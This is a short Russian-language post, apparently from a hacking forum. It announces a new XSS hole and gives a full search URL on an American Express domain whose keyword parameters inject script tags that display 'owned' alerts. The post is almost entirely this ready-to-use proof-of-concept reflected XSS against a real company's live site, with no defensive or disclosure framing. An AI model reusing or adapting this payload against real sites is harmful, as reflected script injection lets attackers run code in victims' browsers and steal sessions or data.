Недавно была найдена новая дыра.В данном случае это xss:
Код:
http://search.americanexpress.com/amex/?sid=10A11E4DD557&N=&country=us&oldKeyword=%3Cscript%3Eslert%28%27owned%27%29%3C%2Fscript%3E&keyword=%3Cscript%3Ealert%28%27owned%21%27%29%3C%2Fscript%3E&categoryId=2001&searchWithinResults=false&x=30&y=10